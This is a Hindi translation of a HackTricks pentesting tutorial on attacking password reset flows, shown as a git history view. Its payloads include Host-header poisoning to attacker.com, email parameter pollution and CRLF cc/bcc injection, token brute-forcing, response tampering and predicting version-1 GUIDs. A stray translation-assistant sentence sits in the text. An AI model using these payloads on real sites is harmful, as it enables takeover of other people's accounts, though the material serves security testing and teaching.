hacktricks/pentesting-web/reset-password.md

328 lines
22 KiB
Markdown
Raw Normal View History

# पासवर्ड रीसेट/भूल गए पासवर्ड बायपास
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
2022-04-28 16:01:33 +00:00
HackTricks का समर्थन करने के अन्य तरीके:
2022-04-28 16:01:33 +00:00
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
2022-04-28 16:01:33 +00:00
</details>
2022-10-27 23:22:18 +00:00
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
2023-02-27 09:28:45 +00:00
[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) सर्वर में शामिल हों और अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!
2023-02-27 09:28:45 +00:00
**हैकिंग इनसाइट्स**\
हैकिंग के रोमांच और चुनौतियों के बारे में गहराई से जानकारी प्राप्त करें
2023-02-27 09:28:45 +00:00
**रियल-टाइम हैक न्यूज**\
रियल-टाइम न्यूज और इनसाइट्स के माध्यम से हैकिंग की तेजी से बदलती दुनिया के साथ अपडेट रहें
2023-07-14 15:03:41 +00:00
**नवीनतम घोषणाएँ**\
नवीनतम बग बाउंटीज लॉन्चिंग और महत्वपूर्ण प्लेटफॉर्म अपडेट्स के साथ सूचित रहें
2023-07-14 15:03:41 +00:00
[**Discord**](https://discord.com/invite/N3FrSbmwdy) पर **हमसे जुड़ें** और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!
2022-10-27 23:22:18 +00:00
निम्नलिखित तकनीकों का संकलन [https://anugrahsr.github.io/posts/10-Password-reset-flaws/](https://anugrahsr.github.io/posts/10-Password-reset-flaws/) से लिया गया था
2023-11-06 08:38:02 +00:00
## पासवर्ड रीसेट टोकन रेफरर के माध्यम से लीक
**HTTP रेफरर** एक वैकल्पिक HTTP हेडर फील्ड है जो उस वेबपेज के पते की पहचान करता है जो अनुरोधित संसाधन से जुड़ा हुआ है। रेफरर अनुरोध हेडर में उस पिछले वेब पेज का पता होता है जिससे वर्तमान अनुरोधित पेज के लिए लिंक का अनुसरण किया गया था
2021-04-07 13:16:44 +00:00
![](https://www.optimizesmart.com/wp-content/uploads/2020/01/1-1-2.jpg)
2023-11-06 08:38:02 +00:00
### शोषण
2023-11-06 08:38:02 +00:00
* अपने ईमेल पते पर पासवर्ड रीसेट का अनुरोध करें
* पासवर्ड रीसेट लिंक पर क्लिक करें
* पासवर्ड न बदलें
* किसी भी तृतीय पक्ष वेबसाइट्स (जैसे: Facebook, Twitter) पर क्लिक करें
* Burpsuite प्रॉक्सी में अनुरोध को इंटरसेप्ट करें
* जांचें कि क्या रेफरर हेडर पासवर्ड रीसेट टोकन लीक कर रहा है।
2023-11-06 08:38:02 +00:00
### प्रभाव
2020-10-07 09:34:02 +00:00
यह उस व्यक्ति को जो किसी विशेष साइट का नियंत्रण रखता है, उपयोगकर्ता का पासवर्ड बदलने की अनुमति देता है (CSRF हमला), क्योंकि इस व्यक्ति को उपयोगकर्ता के रीसेट पासवर्ड टोकन का पता होता है।
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### संदर्भ:
2021-04-07 10:04:56 +00:00
* https://hackerone.com/reports/342693
* https://hackerone.com/reports/272379
* https://hackerone.com/reports/737042
* https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a
* https://medium.com/@shahjerry33/password-reset-token-leak-via-referrer-2e622500c2c1
## पासवर्ड रीसेट पॉइजनिंग
2021-04-07 10:04:56 +00:00
यदि आपको होस्ट हेडर हमला मिलता है और वह स्कोप से बाहर है, तो पासवर्ड रीसेट बटन की तलाश करें!
2021-04-07 10:04:56 +00:00
![](https://portswigger.net/web-security/images/password-reset-poisoning.svg)
2023-11-06 08:38:02 +00:00
### शोषण
2021-04-07 10:04:56 +00:00
* Burpsuite में पासवर्ड रीसेट अनुरोध को इंटरसेप्ट करें
* निम्नलिखित हेडर जोड़ें या burpsuite में हेडर को संपादित करें (एक-एक करके प्रयास करें)
2022-10-26 09:16:32 +00:00
```
2021-04-07 10:04:56 +00:00
Host: attacker.com
```
2022-10-26 09:16:32 +00:00
```
2023-11-06 08:38:02 +00:00
Host: target.com
X-Forwarded-Host: attacker.com
2021-04-07 10:04:56 +00:00
```
2022-10-26 09:16:32 +00:00
```
2023-11-06 08:38:02 +00:00
Host: target.com
Host: attacker.com
2021-04-07 10:04:56 +00:00
```
* जांचें कि क्या ईमेल के अंदर पासवर्ड बदलने के लिए लिंक attacker.com की ओर इशारा कर रहा है
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### पैच
2021-04-07 10:04:56 +00:00
`$_SERVER['SERVER_NAME']` का उपयोग करें `$_SERVER['HTTP_HOST']` के बजाय
2021-04-07 10:04:56 +00:00
```php
$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";
```
2023-11-06 08:38:02 +00:00
### प्रभाव
2021-04-07 10:04:56 +00:00
पीड़ित को उनके ईमेल में दुर्भावनापूर्ण लिंक प्राप्त होगा, और, जब क्लिक किया जाएगा, तो यह हमलावर को उपयोगकर्ता के पासवर्ड रीसेट लिंक / टोकन को लीक कर देगा, जिससे पूर्ण खाता अधिग्रहण हो सकता है।
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### संदर्भ:
2021-04-07 10:04:56 +00:00
* https://hackerone.com/reports/226659
* https://hackerone.com/reports/167631
* https://www.acunetix.com/blog/articles/password-reset-poisoning/
* https://pethuraj.com/blog/how-i-earned-800-for-host-header-injection-vulnerability/
* https://medium.com/@swapmaurya20/password-reset-poisoning-leading-to-account-takeover-f178f5f1de87
## ईमेल पैरामीटर को मैनिपुलेट करके पासवर्ड रीसेट
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### शोषण
2021-04-07 10:04:56 +00:00
* & का उपयोग करके दूसरे पैरामीटर के रूप में हमलावर का ईमेल जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
```
* हमलावर का ईमेल %20 का उपयोग करते हुए दूसरे पैरामीटर के रूप में जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
```
* हमलावर का ईमेल दूसरे पैरामीटर के रूप में | का उपयोग करके जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
```
* हमलावर का ईमेल दूसरे पैरामीटर के रूप में cc का उपयोग करके जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
```
* हमलावर का ईमेल bcc का उपयोग करते हुए दूसरे पैरामीटर के रूप में जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
```
* हमलावर का ईमेल दूसरे पैरामीटर के रूप में , का उपयोग करके जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
```
* जेसन ऐरे में दूसरे पैरामीटर के रूप में हमलावर का ईमेल जोड़ें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
{"email":["victim@mail.tld","atracker@mail.tld"]}
```
2023-11-06 08:38:02 +00:00
### संदर्भ
2021-04-07 10:04:56 +00:00
* https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
* https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
* https://twitter.com/HusseiN98D/status/1254888748216655872
## API पैरामीटर्स के माध्यम से किसी भी उपयोगकर्ता का ईमेल और पासवर्ड बदलना
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### शोषण
2021-04-07 10:04:56 +00:00
* हमलावर को अपने खाते से लॉगिन करना होगा और पासवर्ड बदलने के फंक्शन पर जाना होगा
* Burp Suite शुरू करें और अनुरोध को इंटरसेप्ट करें
* अनुरोध को इंटरसेप्ट करने के बाद इसे रिपीटर में भेजें और ईमेल और पासवर्ड पैरामीटर्स में संशोधन करें
2021-04-07 10:04:56 +00:00
```php
POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})
```
2023-11-06 08:38:02 +00:00
### संदर्भ
2021-04-07 10:04:56 +00:00
* https://medium.com/@adeshkolte/पूर्ण-खाता-अधिग्रहण-किसी-भी-उपयोगकर्ता-का-ईमेल-और-पासवर्ड-बदलना-एपीआई-पैरामीटर्स-के-माध्यम-से-3d527ab27240
2021-04-07 10:04:56 +00:00
### दर नियंत्रण की कमी: ईमेल बमबारी <a href="#5-no-rate-limiting-email-bombing" id="5-no-rate-limiting-email-bombing"></a>
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### शोषण
2021-04-07 10:04:56 +00:00
* Burp Suite शुरू करें और पासवर्ड रीसेट अनुरोध को इंटरसेप्ट करें
2023-11-06 08:38:02 +00:00
* इंट्रूडर को भेजें
* नल पेलोड का उपयोग करें
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
### संदर्भ
2021-04-07 10:04:56 +00:00
* https://hackerone.com/reports/280534
* https://hackerone.com/reports/794395
2023-11-06 08:38:02 +00:00
## पासवर्ड रीसेट टोकन कैसे उत्पन्न होता है यह जानें
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
पासवर्ड रीसेट टोकन के पैटर्न को समझें
2021-04-07 10:04:56 +00:00
2022-10-26 09:16:32 +00:00
![](https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcSvCcLcUTksGbpygrJB4III5BTBYEzYQfKJyg\&usqp=CAU)
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
यदि यह
2021-04-07 10:04:56 +00:00
* Timestamp के आधार पर उत्पन्न होता है
* UserID के आधार पर उत्पन्न होता है
* उपयोगकर्ता के ईमेल के आधार पर उत्पन्न होता है
* Firstname और Lastname के आधार पर उत्पन्न होता है
* जन्म तिथि के आधार पर उत्पन्न होता है
* Cryptography के आधार पर उत्पन्न होता है
2021-04-07 10:04:56 +00:00
Burp Sequencer का उपयोग करके टोकन्स की यादृच्छिकता या अनुमानितता का पता लगाएं।
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
## अनुमान लगाने योग्य GUID
2022-10-26 09:16:32 +00:00
GUID के विभिन्न प्रकार होते हैं:
2022-10-26 09:16:32 +00:00
* **संस्करण 0:** केवल nil GUID ("00000000-0000-0000-0000-000000000000") में देखा गया।
* **संस्करण 1:** GUID निम्नलिखित के आधार पर अनुमानित तरीके से उत्पन्न होता है:
* वर्तमान समय
* एक यादृच्छिक रूप से उत्पन्न "क्लॉक सीक्वेंस" जो GUIDs के उत्पादन के दौरान सिस्टम के अपटाइम के बीच स्थिर रहता है
* एक "नोड ID", जो सिस्टम के MAC पते के आधार पर उत्पन्न होती है यदि यह उपलब्ध है
* **संस्करण 3:** GUID एक प्रदान किए गए नाम और नामस्थान के MD5 हैश का उपयोग करके उत्पन्न होता है।
2023-11-06 08:38:02 +00:00
* **संस्करण 4:** GUID यादृच्छिक रूप से उत्पन्न होता है।
* **संस्करण 5:** GUID एक प्रदान किए गए नाम और नामस्थान के SHA1 हैश का उपयोग करके उत्पन्न होता है।
2022-10-26 09:16:32 +00:00
GUID के संस्करण को जानने के लिए एक छोटा उपकरण है: [**guidtool**](https://github.com/intruder-io/guidtool)****
2022-10-26 09:16:32 +00:00
```http
guidtool -i 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c
UUID version: 1
UUID time: 2021-11-17 17:52:18.141000
UUID timestamp: 138564643381410000
UUID node: 17547390002044
UUID MAC address: 0f:f5:91:f2:a3:7c
UUID clock sequence: 3426
```
यदि पासवर्ड रीसेट GUID जेनरेट करने के लिए प्रयुक्त संस्करण 1 है, तो GUIDS को ब्रूटफोर्स करना संभव है:
2022-10-26 09:16:32 +00:00
```http
guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000
a34aca00-47d0-11ec-8d62-0ff591f2a37c
a34af110-47d0-11ec-8d62-0ff591f2a37c
```
2023-11-06 08:38:02 +00:00
### संदर्भ
2022-10-26 09:16:32 +00:00
* [https://www.intruder.io/research/in-guid-we-trust](https://www.intruder.io/research/in-guid-we-trust)
## प्रतिक्रिया हेरफेर: खराब प्रतिक्रिया को अच्छे के साथ बदलें
2021-04-07 10:04:56 +00:00
इस तरह के Request और Response की तलाश करें
2021-04-07 10:04:56 +00:00
```php
HTTP/1.1 401 Unauthorized
(“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)
```
Sure, here is the translation for the title "Change Response" in Hindi:
2023-11-06 08:38:02 +00:00
```
प्रतिक्रिया बदलें
```
2021-04-07 10:04:56 +00:00
```php
HTTP/1.1 200 OK
(“message”:”success”,”statusCode:200,”errorDescription”:”Success”)
```
2023-11-06 08:38:02 +00:00
### संदर्भ
2021-04-07 10:04:56 +00:00
* https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3
### समाप्त हो चुके टोकन का उपयोग <a href="#8-using-expired-token" id="8-using-expired-token"></a>
2021-04-07 10:04:56 +00:00
* जांचें कि क्या समाप्त हो चुके टोकन का पुन: उपयोग किया जा सकता है
2021-04-07 10:04:56 +00:00
### ब्रूट फोर्स पासवर्ड रीसेट टोकन <a href="#9-brute-force-password-rest-token" id="9-brute-force-password-rest-token"></a>
2021-04-07 10:04:56 +00:00
2023-11-06 08:38:02 +00:00
Burpsuite का उपयोग करके रीसेट टोकन को ब्रूटफोर्स करने का प्रयास करें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email=victim@email.com&code=$BRUTE$
```
2023-11-06 08:38:02 +00:00
### संदर्भ
2021-04-07 10:04:56 +00:00
* https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
### अपना टोकन इस्तेमाल करके देखें <a href="#10-try-using-your-token" id="10-try-using-your-token"></a>
2021-04-07 10:04:56 +00:00
* पीड़ित के खाते के साथ अपना पासवर्ड रीसेट टोकन जोड़ने का प्रयास करें
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email=victim@email.com&code=$YOUR_TOKEN$
```
2023-11-06 08:38:02 +00:00
### संदर्भ
2021-04-07 10:04:56 +00:00
* https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
2021-03-22 09:20:53 +00:00
## सत्र अमान्यीकरण लॉगआउट/पासवर्ड रीसेट में
जब एक उपयोगकर्ता **लॉग आउट करता है या अपना पासवर्ड रीसेट करता है**, वर्तमान सत्र को अमान्य कर देना चाहिए।\
इसलिए, उपयोगकर्ता के लॉग इन होने पर **कुकीज़ प्राप्त करें**, **लॉग आउट करें**, और **जांचें** कि क्या **कुकीज़** अभी भी **मान्य** हैं।\
लॉग आउट करने के बजाय पासवर्ड **बदलने की प्रक्रिया** दोहराएं।
## रीसेट टोकन समाप्ति समय
**रीसेट टोकन का एक समाप्ति समय होना चाहिए**, उसके बाद टोकन को उपयोगकर्ता का पासवर्ड बदलने के लिए मान्य नहीं होना चाहिए।
## अतिरिक्त जांच
* username@burp\_collab.net का उपयोग करें और कॉलबैक का विश्लेषण करें
2023-11-06 08:38:02 +00:00
* उपयोगकर्ता कार्बन कॉपी ईमेल=victim@mail.com%0a%0dcc:hacker@mail.com
* लंबा पासवर्ड (>200) DoS का कारण बनता है
* दूसरे ईमेल पैरामीटर और मूल्य जोड़ें
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
2023-07-14 15:03:41 +00:00
[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) सर्वर में शामिल हों और अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!
2023-07-14 15:03:41 +00:00
**हैकिंग अंतर्दृष्टि**\
हैकिंग के रोमांच और चुनौतियों पर गहराई से विचार करने वाली सामग्री के साथ जुड़ें
2022-10-27 23:22:18 +00:00
**रियल-टाइम हैक समाचार**\
रियल-टाइम समाचार और अंतर्दृष्टि के माध्यम से तेजी से बदलते हैकिंग विश्व के साथ अद्यतन रहें
2022-10-27 23:22:18 +00:00
**नवीनतम घोषणाएँ**\
नवीनतम बग बाउंटीज के लॉन्चिंग और महत्वपूर्ण प्लेटफॉर्म अपडेट्स के साथ सूचित रहें
2023-02-27 09:28:45 +00:00
[**Discord**](https://discord.com/invite/N3FrSbmwdy) पर **हमसे जुड़ें** और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!
2022-10-27 23:22:18 +00:00
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
2022-04-28 16:01:33 +00:00
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) में **शामिल हों** या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का अनुसरण करें।**
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग तरकीबें साझा करें।
2022-04-28 16:01:33 +00:00
</details>